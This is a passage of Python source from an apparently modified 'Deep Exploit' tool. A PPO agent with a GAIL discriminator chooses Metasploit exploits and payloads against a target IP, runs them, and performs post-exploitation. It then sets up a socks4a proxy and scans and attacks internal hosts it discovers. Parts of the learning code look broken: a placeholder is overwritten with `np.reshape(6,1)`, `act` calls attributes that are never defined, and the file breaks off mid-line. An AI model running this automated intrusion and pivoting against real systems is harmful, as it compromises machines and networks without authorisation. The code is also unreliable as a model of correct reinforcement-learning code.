1656 | 1657 | # Define neural network. 1658 | def _build_model(self): 1659 | l_input = Input(batch_shape=(None, NUM_STATES)) 1660 | l_dense1 = Dense(50, activation='relu')(l_input) 1661 | l_dense2 = Dense(100, activation='relu')(l_dense1) 1662 | l_dense3 = Dense(200, activation='relu')(l_dense2) 1663 | #l_dense4 = Dense(400, activation='relu')(l_dense3) 1664 | out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense3) 1665 | out_value = Dense(1, activation='linear')(l_dense3) 1666 | model = Model(inputs=[l_input], outputs=[out_actions, out_value]) 1667 | return model 1668 | 1669 | class Discriminator: 1670 | def __init__(self): 1671 | with tf.variable_scope('discriminator'): 1672 | self.scope = tf.get_variable_scope().name 1673 | self.expert_s = tf.placeholder(dtype=tf.float32, shape=[None] + list((5,))) 1674 | self.expert_a = tf.placeholder(dtype=tf.float32, shape=[None, 593]) 1675 | expert_a_one_hot = self.expert_a 1676 | # add noise for stabilise training 1677 | expert_a_one_hot += tf.random_normal(tf.shape(expert_a_one_hot), mean=0.2, stddev=0.1, dtype=tf.float32)/1.2 1678 | expert_s_a = tf.concat([self.expert_s, expert_a_one_hot], axis=1) 1679 | self.s_t = tf.placeholder(dtype=tf.float32, shape=[None] + list((5,))) 1680 | self.a_t = tf.placeholder(dtype=tf.float32, shape=(None, 593)) 1681 | agent_a_one_hot = self.a_t 1682 | # add noise for stabilise training 1683 | agent_a_one_hot += tf.random_normal(tf.shape(agent_a_one_hot), mean=0.2, stddev=0.1, dtype=tf.float32) / 1.2 1684 | agent_s_a = tf.concat([self.s_t, agent_a_one_hot], axis=1) 1685 | 1686 | with tf.variable_scope('network') as network_scope: 1687 | prob_1 = self.construct_network(input=expert_s_a) 1688 | network_scope.reuse_variables() # share parameter 1689 | prob_2 = self.construct_network(input=agent_s_a) 1690 | 1691 | with tf.variable_scope('loss'): 1692 | loss_expert = tf.reduce_mean(tf.log(tf.clip_by_value(prob_1, 0.01, 1))) 1693 | loss_agent = tf.reduce_mean(tf.log(tf.clip_by_value(1 - prob_2, 0.01, 1))) 1694 | loss = loss_expert + loss_agent 1695 | loss = -loss 1696 | tf.summary.scalar('discriminator', loss) 1697 | with tf.variable_scope("Opt", reuse=tf.AUTO_REUSE): 1698 | optimizer = tf.train.AdamOptimizer() 1699 | self.train_op = optimizer.minimize(loss) 1700 | 1701 | self.rewards = tf.log(tf.clip_by_value(prob_2, 1e-10, 1)) # log(P(expert|s,a)) larger is better for agent 1702 | 1703 | def train(self, expert_s, expert_a, s, a): 1704 | return SESS.run(self.train_op, feed_dict={self.expert_s: expert_s, 1705 | self.expert_a: expert_a, 1706 | self.s_t: s, 1707 | self.a_t: a}) 1708 | 1709 | def get_rewards(self, s, a): 1710 | return SESS.run(self.rewards, feed_dict={self.s_t: s, 1711 | self.a_t: a}) 1712 | def construct_network(self, input): 1713 | with tf.variable_scope("pro", reuse=tf.AUTO_REUSE): 1714 | layer_1 = tf.layers.dense(inputs=input, units=50, activation=tf.nn.leaky_relu, name='layer1') 1715 | layer_2 = tf.layers.dense(inputs=layer_1, units=100, activation=tf.nn.leaky_relu, name='layer2') 1716 | layer_3 = tf.layers.dense(inputs=layer_2, units=200, activation=tf.nn.leaky_relu, name='layer3') 1717 | prob = tf.layers.dense(inputs=layer_3, units=1, activation=tf.sigmoid, name='prob') 1718 | return prob 1719 | 1720 | # LocalBrain 1721 | class LocalBrain: 1722 | def __init__(self, name, parameter_server): 1723 | self.util = Utilty() 1724 | self.model_old = self._build_model() 1725 | self.discriminator = Discriminator() 1726 | with tf.name_scope(name): 1727 | # s, a, r, s', s' terminal mask 1728 | self.train_queue = [[], [], [], [], []] 1729 | K.set_session(SESS) 1730 | 1731 | # Define neural network. 1732 | self.model = self._build_model() 1733 | # Define learning method. 1734 | self._build_graph(name, parameter_server) 1735 | 1736 | # Define neural network. 1737 | def _build_model(self): 1738 | l_input = Input(batch_shape=(None, NUM_STATES)) 1739 | l_dense1 = Dense(50, activation='relu')(l_input) 1740 | l_dense2 = Dense(100, activation='relu')(l_dense1) 1741 | l_dense3 = Dense(200, activation='relu')(l_dense2) 1742 | # l_dense4 = Dense(400, activation='relu')(l_dense3) 1743 | self.s_t = tf.placeholder(dtype=tf.float32, shape=(None, NUM_STATES), name='states') 1744 | self.out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense3) # policy net 1745 | self.out_value = Dense(1, activation='linear')(l_dense3) # value net 1746 | model = Model(inputs=[l_input], outputs=[self.out_actions, self.out_value]) 1747 | # Have to initialize before threading 1748 | model._make_predict_function() 1749 | return model 1750 | 1751 | # self.act_stochastic = tf.multinomial(tf.log(self.out_actions), num_samples=1) 1752 | # self.act_stochastic = tf.reshape(self.act_stochastic, shape=[-1]) # 随机动作 1753 | # 1754 | # self.act_deterministic = tf.argmax(self.out_actions, axis=1) # 输出确定的动作 取最大 1755 | # self.scope = tf.get_variable_scope().name 1756 | 1757 | # Define neural network. 1758 | def _build_graph(self, name, parameter_server): 1759 | #self.s_t = tf.placeholder(tf.float32, shape=(None, NUM_STATES), name='states') 1760 | self.a_t = tf.placeholder(tf.int32, shape=(None, NUM_ACTIONS), name='actions') 1761 | self.out_value_next = tf.placeholder(dtype=tf.float32, shape=[None]+ list((1,)), name='out_value_next') 1762 | self.gaes = tf.placeholder(dtype=tf.float32, shape=[None]+ list((1,)), name='gaes') 1763 | # Not immediate, but discounted n step reward 1764 | self.r_t = tf.placeholder(tf.float32, shape=(None, 1), name='rewards') 1765 | 1766 | out_actions_old, out_value_old = self.model_old(self.s_t) 1767 | self.model_old.set_weights(self.model.get_weights()) 1768 | 1769 | out_actions, out_value = self.model(self.s_t) 1770 | 1771 | # probabilities of actions which agent took with policy 1772 | #out_actions = out_actions * tf.one_hot(indices=self.a_t, depth=out_actions.shape[1]) 1773 | out_actions = tf.reduce_sum(out_actions, axis=1) 1774 | 1775 | # probabilities of actions which agent took with old policy 1776 | #out_actions_old = out_actions_old * tf.one_hot(indices=self.a_t, depth=out_actions_old.shape[1]) 1777 | out_actions_old= tf.reduce_sum(out_actions_old, axis=1) 1778 | 1779 | with tf.variable_scope('loss'): 1780 | # construct computation graph for loss_clip 1781 | # ratios = tf.divide(act_probs, act_probs_old) 1782 | ratios = tf.exp(tf.log(tf.clip_by_value(out_actions, 1e-10, 1.0)) 1783 | - tf.log(tf.clip_by_value(out_actions_old, 1e-10, 1.0))) 1784 | clipped_ratios = tf.clip_by_value(ratios, clip_value_min=1 - clip_value, clip_value_max=1 + clip_value) 1785 | loss_clip = tf.minimum(tf.multiply(self.gaes, ratios), tf.multiply(self.gaes, clipped_ratios)) 1786 | loss_clip = tf.reduce_mean(loss_clip) 1787 | tf.summary.scalar('loss_clip', loss_clip) 1788 | 1789 | # construct computation graph for loss of entropy bonus 1790 | entropy = -tf.reduce_sum(out_actions * 1791 | tf.log(tf.clip_by_value(out_actions, 1e-10, 1.0))) 1792 | entropy = tf.reduce_mean(entropy) # mean of entropy of pi(obs) 1793 | tf.summary.scalar('entropy', entropy) 1794 | 1795 | # construct computation graph for loss of value function 1796 | x = self.out_value_next 1797 | x = np.reshape(6,1) 1798 | 1799 | loss_vf = tf.squared_difference(self.r_t + GAMMA * x, out_value) 1800 | loss_vf = tf.reduce_mean(loss_vf) 1801 | tf.summary.scalar('value_difference', loss_vf) 1802 | 1803 | # construct computation graph for loss 1804 | loss = loss_clip - c_1 * loss_vf + c_2 * entropy 1805 | 1806 | # minimize -loss == maximize loss 1807 | self.loss = -loss 1808 | tf.summary.scalar('total', loss) 1809 | 1810 | self.merged = tf.summary.merge_all() 1811 | with tf.variable_scope("Opt", reuse=tf.AUTO_REUSE): 1812 | optimizer = tf.train.AdamOptimizer(learning_rate=5e-5, epsilon=1e-5) 1813 | self.gradients = optimizer.compute_gradients(loss)#var_list=self.pi_trainable) 1814 | self.train_op = optimizer.minimize(loss) #var_list=self.pi_trainable) 1815 | 1816 | # Define weight. 1817 | self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name) 1818 | self.old_weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name) 1819 | # Define grads. 1820 | self.grads_actor = tf.gradients(loss_clip, self.weights_params) 1821 | self.grads = tf.gradients(loss, self.weights_params) 1822 | 1823 | #Define updating weight of ActorNet 1824 | self.update_actor_weight_params = [l_p.assign(g_p) 1825 | for l_p, g_p in zip(self.old_weights_params, self.weights_params)] 1826 | # Define updating weight of ParameterServe 1827 | self.update_global_weight_params = \ 1828 | parameter_server.optimizer.apply_gradients(zip(self.grads, parameter_server.weights_params)) 1829 | 1830 | # Define copying weight of ParameterServer to LocalBrain.复制主线程参数到子线程 1831 | self.pull_global_weight_params = [l_p.assign(g_p) 1832 | for l_p, g_p in zip(self.weights_params, parameter_server.weights_params)] 1833 | 1834 | # Define copying weight of LocalBrain to ParameterServer.复制子线程参数到主线程 1835 | self.push_local_weight_params = [g_p.assign(l_p) 1836 | for g_p, l_p in zip(parameter_server.weights_params, self.weights_params)] 1837 | 1838 | # Pull ParameterServer weight to local thread. 1839 | def pull_parameter_server(self): 1840 | SESS.run(self.pull_global_weight_params) 1841 | 1842 | # Push local thread weight to ParameterServer. 1843 | def push_parameter_server(self): 1844 | SESS.run(self.push_local_weight_params) 1845 | 1846 | 1847 | def get_trainable_variables(self): 1848 | return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope) 1849 | # Updating weight using grads of LocalBrain (learning). 1850 | def update_parameter_server(self): 1851 | if len(self.train_queue[0]) < MIN_BATCH: 1852 | return 1853 | 1854 | self.util.print_message(NOTE, 'Update LocalBrain weight to ParameterServer.') 1855 | print(update_local_weight_count) 1856 | s, a, r, s_, s_mask = self.train_queue 1857 | self.train_queue = [[], [], [], [], []] 1858 | s = np.vstack(s) 1859 | a = np.vstack(a) 1860 | r = np.vstack(r) 1861 | 1862 | s_ = np.vstack(s_) 1863 | s_mask = np.vstack(s_mask) 1864 | _, v = self.model.predict(s_) 1865 | v = np.vstack(v) 1866 | # Set v to 0 where s_ is terminal state 1867 | 1868 | for i in range(2): 1869 | self.discriminator.train(expert_s=expert_s, 1870 | expert_a=expert_a, 1871 | s = s, 1872 | a = a) 1873 | d_rewards = self.discriminator.get_rewards(s=s, a=a) 1874 | v_next = v[1:] 1875 | deltas = [r_t + GAMMA * v_next - v for r_t, v_next, v in zip(d_rewards, v_next, v)] 1876 | # calculate generative advantage estimator(lambda = 1), see ppo paper eq(11) 1877 | gaes = copy.deepcopy(deltas) 1878 | for t in reversed(range(len(gaes) - 1)): # is T-1, where T is time step which run policy 1879 | gaes[t] = gaes[t] + GAMMA * gaes[t + 1] 1880 | gaes = np.array(gaes) 1881 | #gaes = (gaes - gaes.mean()) / gaes.std() 1882 | r = r + GAMMA_N * v * s_mask 1883 | feed_dict = {self.s_t: s, self.a_t: a, self.r_t: d_rewards, self.out_value_next:v_next, self.gaes:gaes} # data of updating weight. 1884 | inp = [s, a, gaes, d_rewards, v_next] 1885 | SESS.run(self.update_actor_weight_params, feed_dict) # Update actor weight. 1886 | # train 1887 | # for epoch in range(6): 1888 | # # sample indices from [low, high) 1889 | # sample_indices = np.random.randint(low=0, high=s.shape[0], size=32) 1890 | # sampled_inp = [np.take(a=a, indices=sample_indices, axis=0) for a in inp] # sample training data 1891 | # self.train(s=sampled_inp[0], 1892 | # a=sampled_inp[1], 1893 | # gaes=sampled_inp[2], 1894 | # r=sampled_inp[3], 1895 | # out_value_next=sampled_inp[4]) 1896 | SESS.run(self.update_global_weight_params, feed_dict) # Update ParameterServer weight. 1897 | loss = SESS.run(self.loss, feed_dict) 1898 | writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='loss', simple_value = loss)]), update_local_weight_count) 1899 | 1900 | def act(self, s, stochastic=True): 1901 | if stochastic: 1902 | return SESS.run([self.act_stochastic, self.out_value], feed_dict={self.s_t: s}) 1903 | else: 1904 | return SESS.run([self.act_deterministic, self.out_value], feed_dict={self.s_t: s}) 1905 | 1906 | 1907 | def get_variables(self): 1908 | return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope) 1909 | 1910 | def get_trainable_variables(self): 1911 | return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope) 1912 | 1913 | def train(self, s , a , gaes, r, out_value_next): 1914 | SESS.run(self.train_op, feed_dict={ 1915 | self.s_t: s, 1916 | self.a_t: a, 1917 | self.r_t: r, 1918 | self.out_value: out_value_next, 1919 | self.gaes: gaes}) 1920 | 1921 | 1922 | def get_grad(self, s, a, gaes, r, out_value_next): 1923 | return SESS.run(self.gradients, feed_dict={self.model.s_t:s, 1924 | self.model_old.s_t: s, 1925 | self.a_t: a, 1926 | self.r_t: r, 1927 | self.out_value_next: out_value_next, 1928 | self.gaes: gaes}) 1929 | 1930 | # Return probability of action usin state (s). 1931 | def predict_p(self, s): #p对应out_actions 1932 | p, v = self.model.predict(s) 1933 | return p 1934 | 1935 | def predict_p_old(self,s): 1936 | p_old, v_old = self.model_old.predict(s) 1937 | return p_old 1938 | 1939 | def train_push(self, s, a, r, s_): 1940 | self.train_queue[0].append(s) 1941 | self.train_queue[1].append(a) 1942 | self.train_queue[2].append(r) 1943 | 1944 | if s_ is None: 1945 | self.train_queue[3].append(NONE_STATE) 1946 | self.train_queue[4].append(0.) 1947 | else: 1948 | self.train_queue[3].append(s_) 1949 | self.train_queue[4].append(1.) 1950 | 1951 | 1952 | # Agent 1953 | class Agent: 1954 | def __init__(self, name, parameter_server): 1955 | self.brain = LocalBrain(name, parameter_server) 1956 | self.memory = [] # Memory of s,a,r,s_ 1957 | self.R = 0. # Time discounted total reward. 1958 | 1959 | def act(self, s, available_action_list, eps_steps): 1960 | # Decide action using epsilon greedy. 1961 | if frames >= eps_steps: 1962 | eps = EPS_END 1963 | else: 1964 | # Linearly interpolate 1965 | eps = EPS_START + frames * (EPS_END - EPS_START) / eps_steps 1966 | 1967 | if random.random() < eps: 1968 | # Randomly select action. 1969 | if len(available_action_list) != 0: 1970 | return available_action_list[random.randint(0, len(available_action_list) - 1)], None, None 1971 | else: 1972 | return 'no payload', None, None 1973 | else: 1974 | # Select action according to probability p[0] (greedy). 1975 | s = np.array([s]) 1976 | p = self.brain.predict_p(s) 1977 | if len(available_action_list) != 0: 1978 | prob = [] 1979 | for action in available_action_list: 1980 | prob.append([action, p[0][action]]) 1981 | prob.sort(key=lambda s: -s[1]) 1982 | return prob[0][0], prob[0][1], prob 1983 | else: 1984 | return 'no payload', p[0][len(p[0]) - 1], None 1985 | 1986 | # Push s,a,r,s considering advantage to LocalBrain. 1987 | def advantage_push_local_brain(self, s, a, r, s_): 1988 | def get_sample(memory, n): 1989 | s, a, _, _ = memory[0] 1990 | _, _, _, s_ = memory[n - 1] 1991 | return s, a, self.R, s_ 1992 | 1993 | # Create a_cats (one-hot encoding) 1994 | a_cats = np.zeros(NUM_ACTIONS) 1995 | a_cats[a] = 1 1996 | self.memory.append((s, a_cats, r, s_)) 1997 | 1998 | # Calculate R using previous time discounted total reward. 1999 | self.R = (self.R + r * GAMMA_N) / GAMMA 2000 | 2001 | # Input experience considering advantage to LocalBrain. 2002 | if s_ is None: 2003 | while len(self.memory) > 0: 2004 | n = len(self.memory) 2005 | s, a, r, s_ = get_sample(self.memory, n) 2006 | self.brain.train_push(s, a, r, s_) 2007 | self.R = (self.R - self.memory[0][2]) / GAMMA 2008 | self.memory.pop(0) 2009 | 2010 | self.R = 0 2011 | 2012 | if len(self.memory) >= N_STEP_RETURN: 2013 | s, a, r, s_ = get_sample(self.memory, N_STEP_RETURN) 2014 | self.brain.train_push(s, a, r, s_) 2015 | self.R = self.R - self.memory[0][2] 2016 | self.memory.pop(0) 2017 | 2018 | 2019 | # Environment. 2020 | class Environment: 2021 | total_reward_vec = np.zeros(10) 2022 | count_trial_each_thread = 0 2023 | 2024 | def __init__(self, name, thread_type, parameter_server, rhost): 2025 | self.name = name 2026 | self.thread_type = thread_type 2027 | self.env = Metasploit(rhost) 2028 | self.agent = Agent(name, parameter_server) 2029 | self.util = Utilty() 2030 | 2031 | def run(self, exploit_tree, target_tree): 2032 | self.agent.brain.pull_parameter_server() # Copy ParameterSever weight to LocalBrain 2033 | global frames # Total number of trial in total session. 2034 | global isFinish # Finishing of learning/testing flag. 2035 | global exploit_count # Number of successful exploitation. 2036 | global post_exploit_count # Number of successful post-exploitation. 2037 | global plot_count # Exploitation count list for plot. 2038 | global plot_pcount # Post-exploit count list for plot. 2039 | global update_local_weight_count 2040 | if self.thread_type == 'test': 2041 | # Execute exploitation. 2042 | self.util.print_message(NOTE, 'Execute exploitation.') 2043 | session_list = [] 2044 | for port_num in com_port_list: 2045 | execute_list = [] 2046 | target_info = {} 2047 | module_list = target_tree[port_num]['exploit'] 2048 | for exploit in module_list: 2049 | target_list = exploit_tree[exploit[8:]]['target_list'] 2050 | for target in target_list: 2051 | skip_flag, s, payload_list, target_info = self.env.get_state(exploit_tree, 2052 | target_tree, 2053 | port_num, 2054 | exploit, 2055 | target) 2056 | if skip_flag is False: 2057 | # Get available payload index. 2058 | available_actions = self.env.get_available_actions(payload_list) 2059 | 2060 | # Decide action using epsilon greedy. 2061 | frames = self.env.eps_steps 2062 | _, _, p_list = self.agent.act(s, available_actions, self.env.eps_steps) 2063 | # Append all payload probabilities. 2064 | if p_list is not None: 2065 | for prob in p_list: 2066 | execute_list.append([prob[1], exploit, target, prob[0], target_info]) 2067 | else: 2068 | continue 2069 | 2070 | # Execute action. 2071 | execute_list.sort(key=lambda s: -s[0]) 2072 | for idx, exe_info in enumerate(execute_list): 2073 | # Execute exploit. 2074 | _, _, done, sess_info = self.env.execute_exploit(exe_info[3], 2075 | self.name, 2076 | self.thread_type, 2077 | exe_info[2], 2078 | exe_info[4], 2079 | idx, 2080 | exploit_tree) 2081 | 2082 | # Store session information. 2083 | if len(sess_info) != 0: 2084 | session_list.append(sess_info) 2085 | 2086 | # Change port number for next exploitation. 2087 | if done is True: 2088 | break 2089 | 2090 | # Execute post exploitation. 2091 | new_target_list = [] 2092 | for session in session_list: 2093 | self.util.print_message(NOTE, 'Execute post exploitation.') 2094 | self.util.print_message(OK, 'Target session info.\n' 2095 | ' session id : {0}\n' 2096 | ' session type : {1}\n' 2097 | ' target port : {2}\n' 2098 | ' exploit : {3}\n' 2099 | ' target : {4}\n' 2100 | ' payload : {5}'.format(session['id'], 2101 | session['type'], 2102 | session['port'], 2103 | session['exploit'], 2104 | session['target'], 2105 | session['payload'])) 2106 | internal_ip_list = self.env.execute_post_exploit(session['id'], session['type']) 2107 | for ip_addr in internal_ip_list: 2108 | if ip_addr not in self.env.prohibited_list and ip_addr != self.env.rhost: 2109 | new_target_list.append(ip_addr) 2110 | else: 2111 | self.util.print_message(WARNING, 'Target IP={} is prohibited.'.format(ip_addr)) 2112 | 2113 | # Deep penetration. 2114 | new_target_list = list(set(new_target_list)) 2115 | if len(new_target_list) != 0: 2116 | # Launch Socks4a proxy. 2117 | module = 'auxiliary/server/socks4a' 2118 | self.util.print_message(NOTE, 'Set proxychains: SRVHOST={}, SRVPORT={}'.format(self.env.proxy_host, 2119 | str(self.env.proxy_port))) 2120 | option = {'SRVHOST': self.env.proxy_host, 'SRVPORT': self.env.proxy_port} 2121 | job_id, uuid = self.env.client.execute_module('auxiliary', module, option) 2122 | if uuid is None: 2123 | self.util.print_message(FAIL, 'Failure executing module: {}'.format(module)) 2124 | isFinish = True 2125 | return 2126 | 2127 | # Further penetration. 2128 | self.env.source_host = self.env.rhost 2129 | self.env.prohibited_list.append(self.env.rhost) 2130 | self.env.isPostExploit = True 2131 | self.deep_run(new_target_list) 2132 | 2133 | isFinish = True 2134 | else: 2135 | # Execute learning. 2136 | skip_flag, s, payload_list, target_list, target_info = self.env.reset_state(exploit_tree, target_tree) 2137 | 2138 | # If product name is 'unknown', skip. 2139 | if skip_flag is False: 2140 | R = 0 2141 | step = 0 2142 | while True: 2143 | # Decide action (randomly or epsilon greedy). 2144 | available_actions = self.env.get_available_actions(payload_list) 2145 | a, _, _ = self.agent.act(s, available_actions, self.env.eps_steps) 2146 | # Execute action. 2147 | s_, r, done, _ = self.env.execute_exploit(a, 2148 | self.name, 2149 | self.thread_type, 2150 | target_list, 2151 | target_info, 2152 | step, 2153 | exploit_tree, 2154 | frames) 2155 | step += 1 2156 | 2157 | # Update payload list according to new target. 2158 | payload_list = exploit_tree[target_info['exploit']]['targets'][str(self.env.state[ST_TARGET])] 2159 | 2160 | # If trial exceed maximum number of trials at current episode, 2161 | # finish trial at current episode. 2162 | if step > MAX_STEPS: 2163 | done = True 2164 | 2165 | # Increment frame number. 2166 | frames += 1 2167 | 2168 | # Increment number of successful exploitation. 2169 | if r == R_GOOD: 2170 | exploit_count += 1 2171 | 2172 | # Increment number of successful post-exploitation. 2173 | if r == R_GREAT: 2174 | exploit_count += 1 2175 | post_exploit_count += 1 2176 | 2177 | # Plot number of successful post-exploitation each 100 frames. 2178 | if frames % 100 == 0: 2179 | self.util.print_message(NOTE, 'Plot number of successful post-exploitation.') 2180 | plot_count.append(exploit_count) 2181 | plot_pcount.append(post_exploit_count) 2182 | exploit_count = 0 2183 | post_exploit_count = 0 2184 | 2185 | # Push reward and experience considering advantage.to LocalBrain. 2186 | if a == 'no payload': 2187 | a = len(com_payload_list) - 1 2188 | self.agent.advantage_push_local_brain(s, a, r, s_) 2189 | 2190 | s = s_ 2191 | R += r 2192 | # Copy updating ParameterServer weight each Tmax. 2193 | if done or (step % Tmax == 0): 2194 | if not (isFinish): 2195 | 2196 | self.agent.brain.update_parameter_server() 2197 | update_local_weight_count += 1 2198 | self.agent.brain.push_parameter_server() 2199 | 2200 | if done: 2201 | # Discard the old total reward and keep the latest 10 pieces. 2202 | self.total_reward_vec = np.hstack((self.total_reward_vec[1:], step)) 2203 | # Increment total trial number of thread. 2204 | self.count_trial_each_thread += 1 2205 | break 2206 | REWARDS.append(r) 2207 | writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='episode_reward', simple_value=sum(REWARDS))]), frames) 2208 | # Output total number of trials, thread name, current reward to console. 2209 | self.util.print_message(OK, 'Thread: {}, Trial num: {}, ' 2210 | 'Step: {}, Avg step: {}'.format(self.name, 2211 | str(self.count_trial_each_thread), 2212 | str(step), 2213 | str(self.total_reward_vec.mean()))) 2214 | 2215 | # End of learning. 2216 | if frames > MAX_TRAIN_NUM: 2217 | self.util.print_message(OK, 'Finish train:{}'.format(self.name)) 2218 | isFinish = True 2219 | self.util.print_message(OK, 'Stopping learning...') 2220 | time.sleep(30.0) 2221 | # Push params of thread to ParameterServer. 2222 | self.agent.brain.pull_parameter_server() 2223 | 2224 | # Further penetration. 2225 | def deep_run(self, target_ip_list): 2226 | for target_ip in target_ip_list: 2227 | result_file = 'nmap_result_' + target_ip + '.xml' 2228 | command = self.env.nmap_2nd_command + ' ' + result_file + ' ' + target_ip + '\n' 2229 | self.env.execute_nmap(target_ip, command, self.env.nmap_2nd_timeout) 2230 | com_port_list, proto_list, info_list = self.env.get_port_list(result_file, target_ip) 2231 | 2232 | # Get exploit tree and target info. 2233 | exploit_tree = self.env.get_exploit_tree() 2234 | target_tree = self.env.get_target_info(target_ip, proto_list, info_list) 2235 | 2236 | # Execute exploitation. 2237 | self.env.rhost = target_ip 2238 | self.run(exploit_tree, target_tree) 2239 | 2240 | 2241 | # WorkerThread 2242 | class Worker_thread: 2243 | def __init__(self, thread_name, thread_type, parameter_server, rhost): 2244 | self.environment = Environment(thread_name, thread_type, parameter_server, rhost) 2245 | self.thread_name = thread_name 2246 | self.thread_type = thread_type 2247 | self.util = Utilty() 2248 | 2249 | # Execute learning or testing. 2250 | def run(self, exploit_tree, target_tree, saver=None, train_path=None): 2251 | self.util.print_message(NOTE, 'Executing start: {}'.format(self.thread_name)) 2252 | while True: 2253 | if self.thread_type == 'learning': 2254 | # Execute learning thread. 2255 | self.environment.run(exploit_tree, target_tree) 2256 | 2257 | # Stop learning thread. 2258 | if isFinish: 2259 | self.util.print_message(OK, 'Finish train: {}'.format(self.thread_name)) 2260 | time.sleep(3.0) 2261 | 2262 | # Finally save learned weights. 2263 | self.util.print_message(OK, 'Save learned data: {}'.format(self.thread_name)) 2264 | saver.save(SESS, train_path) 2265 | 2266 | # Disconnection RPC Server. 2267 | self.environment.env.client.termination(self.environment.env.client.console_id) 2268 | 2269 | if self.thread_name == 'local_thread1': 2270 | # Create plot. 2271 | df_plot = pd.DataFrame({'exploitation': plot_count, 2272 | 'post-exploitation': plot_pcount}) 2273 | nowTime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S') 2274 | name='experiment'+str(nowTime) 2275 | df_plot.to_csv(os.path.join(self.environment.env.data_path, name+".csv")) 2276 | df_plot.plot(kind='line', title='Training result.', legend=True) 2277 | plt.savefig(self.environment.env.plot_file) 2278 | plt.close('all') 2279 | 2280 | # Create report. 2281 | report = CreateReport() 2282 | report.create_report('train', pd.to_datetime(self.environment.env.scan_start_time)) 2283 | break 2284 | else: 2285 | # Execute testing thread. 2286 | self.environment.run(exploit_tree, target_tree) 2287 | 2288 | # Stop testing thread. 2289 | if isFinish: 2290 | self.util.print_message(OK, 'Finish test.') 2291 | time.sleep(3.0) 2292 | 2293 | # Disconnection RPC Server. 2294 | self.environment.env.client.termination(self.environment.env.client.console_id) 2295 | 2296 | # Create report. 2297 | report = CreateReport() 2298 | report.create_report('test', pd.to_datetime(self.environment.env.scan_start_time)) 2299 | break 2300 | 2301 | 2302 | # Show initial banner. 2303 | def show_banner(util, delay_time=2.0): 2304 | banner = u""" 2305 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 2306 | ██████╗ ███████╗███████╗██████╗ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ 2307 | ██╔══██╗██╔════╝██╔════╝██╔══██╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ 2308 | ██║ ██║█████╗ █████╗ ██████╔╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ 2309 | ██║ ██║██╔══╝ ██╔══╝ ██╔═══╝ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ 2310 | ██████╔╝███████╗███████╗██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ 2311 | ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ (beta) 2312 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 2313 | """ 2314 | util.print_message(NONE, banner) 2315 | show_credit(util) 2316 | #time.sleep(delay_time) 2317 | 2318 | 2319 | # Show credit. 2320 | def show_credit(util): 2321 | credit = u""" 2322 | =[ Deep Exploit v0.0.2-beta ]= 2323 | + -- --=[ Author : Isao Takaesu (@bbr_bbq) ]=-- 2324 | + -- --=[ Website : https://github.com/13o-bbr-bbq/machine_learning_security/ ]=-- 2325 | """ 2326 | util.print_message(NONE, credit) 2327 | 2328 | 2329 | # Check IP address format. 2330 | def is_valid_ip(rhost): 2331 | try: 2332 | ipaddress.ip_address(rhost) 2333 | return True 2334 | except ValueError: 2335 | return False 2336 | 2337 | 2338 | # Define command option. 2339 | __doc__ = """{f} 2340 | Usage: 2341 | {f} (-t | --target ) (-m | --mode ) 2342 | {f} (-t | --target ) [(-p | --port )] [(-s | --service )] 2343 | {f} -h | --help 2344 | 2345 | Options: 2346 | -t --target Require : IP address of target server. 2347 | -m --mode Require : Execution mode "train/test". 2348 | -p --port Optional : Indicate port number of target server. 2349 | -s --service Optional : Indicate product name of target server. 2350 | -h --help Optional : Show this screen and exit. 2351 | """.format(f=__file__) 2352 | 2353 | 2354 | # Parse command arguments. 2355 | def command_parse(): 2356 | args = docopt(__doc__) 2357 | ip_addr = args[''] 2358 | mode = args[''] 2359 | port = args[''] 2360 | service = args[''] 2361 | return ip_addr, mode, port, service 2362 | 2363 | 2364 | # Check parameter values. 2365 | def check_port_value(port=None, service=None): 2366 | if port is not None: 2367 | if port.isdigit() is False: 2368 | Utilty().print_message(OK, 'Invalid port number: {}'.format(port)) 2369 | return False 2370 | elif (int(port) < 1) or (int(port) > 65535): 2371 | Utilty().print_message(OK, 'Invalid port number: {}'.format(port)) 2372 | return False 2373 | elif port not in com_port_list: 2374 | Utilty().print_message(OK, 'Not open port number: {}'.format(port)) 2375 | return False 2376 | elif service is None: 2377 | Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service))) 2378 | return False 2379 | elif type(service) == 'int': 2380 | Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service))) 2381 | return False 2382 | else: 2383 | return True 2384 | else: 2385 | return False 2386 | 2387 | 2388 | # Common list of all threads. 2389 | com_port_list = [] 2390 | com_exploit_list = [] 2391 | com_payload_list = [] 2392 | com_indicate_flag = False 2393 | 2394 | 2395 | if __name__ == '__main__': 2396 | t1 = time.time() 2397 | util = Utilty() 2398 | REWARDS = [] 2399 | path = os.path.join("/home/star/DeepExploit1/bingo/") 2400 | file = path + "DPPOGAILbingo8.21" + ".csv" 2401 | expert_a = [] 2402 | expert_s = np.genfromtxt( 2403 | '/home/star/DeepExploit1/trajectory/GAIL_state.csv') 2404 | a_list = np.genfromtxt( 2405 | '/home/star/DeepExploit1/trajectory/GAIL_action.csv', dtype=np.int32) 2406 | a_cats = 